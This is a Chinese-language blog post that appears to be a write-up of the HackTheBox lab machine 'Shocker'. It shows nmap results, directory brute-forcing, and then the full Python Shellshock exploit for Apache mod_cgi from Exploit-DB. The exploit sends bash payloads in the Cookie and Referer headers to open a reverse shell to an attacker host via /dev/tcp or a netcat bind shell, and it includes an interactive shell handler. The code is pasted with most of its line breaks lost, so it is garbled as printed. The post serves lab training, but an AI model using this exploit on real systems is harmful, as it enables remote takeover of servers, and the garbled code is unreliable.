当前位置：首页 > news >正文

[Meachines] [Easy] shocker CGI-BIN Shell Shock + Perl权限提升

news 来源：原创 2024/9/19 21:59:06

信息收集

IP Address	Opening Ports
10.10.10.56	TCP:80,2222

$ nmap -p- 10.10.10.56 --min-rate 1000 -sC -sV

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CGI-BIN Shell Shock

$ dirb http://10.10.10.56/

$ searchsploit -w apache mod_cgi

https://www.exploit-db.com/exploits/34900

#!/usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sysstop = False
proxyhost = ""
proxyport = 0def usage():print """Shellshock apache mod_cgi remote exploitUsage:
./exploit.py var=<value>Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxyPayloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)Example:./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234Credits:Federico Galatolo 2014
"""sys.exit(0)def exploit(lhost,lport,rhost,rport,payload,pages):headers = {"Cookie": payload, "Referer": payload}for page in pages:if stop:returnprint "[-] Trying exploit on : "+pageif proxyhost != "":c = httplib.HTTPConnection(proxyhost,proxyport)c.request("GET","http://"+rhost+page,headers=headers)res = c.getresponse()else:c = httplib.HTTPConnection(rhost)c.request("GET",page,headers=headers)res = c.getresponse()if res.status == 404:print "[*] 404 on : "+pagetime.sleep(1)args = {}for arg in sys.argv[1:]:ar = arg.split("=")args[ar[0]] = ar[1]
try:args['payload']
except:usage()if args['payload'] == 'reverse':try:lhost = args['lhost']lport = int(args['lport'])rhost = args['rhost']payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"except:usage()
elif args['payload'] == 'bind':try:rhost = args['rhost']rport = args['rport']payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"except:usage()
else:print "[*] Unsupported payload"usage()try:pages = args['pages'].split(",")
except:pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]try:proxyhost,proxyport = args['proxy'].split(":")
except:passif args['payload'] == 'reverse':serversocket = socket(AF_INET, SOCK_STREAM)buff = 1024addr = (lhost, lport)serversocket.bind(addr)serversocket.listen(10)print "[!] Started reverse shell handler"thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':serversocket = socket(AF_INET, SOCK_STREAM)addr = (rhost,int(rport))thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))buff = 1024while True:if args['payload'] == 'reverse':clientsocket, clientaddr = serversocket.accept()print "[!] Successfully exploited"print "[!] Incoming connection from "+clientaddr[0]stop = Trueclientsocket.settimeout(3)while True:reply = raw_input(clientaddr[0]+"> ")clientsocket.sendall(reply+"\n")try:data = clientsocket.recv(buff)print dataexcept:passif args['payload'] == 'bind':try:serversocket = socket(AF_INET, SOCK_STREAM)time.sleep(1)serversocket.connect(addr)print "[!] Successfully exploited"print "[!] Connected to "+rhoststop = Trueserversocket.settimeout(3)while True:reply = raw_input(rhost+"> ")serversocket.sendall(reply+"\n")data = serversocket.recv(buff)print dataexcept:pass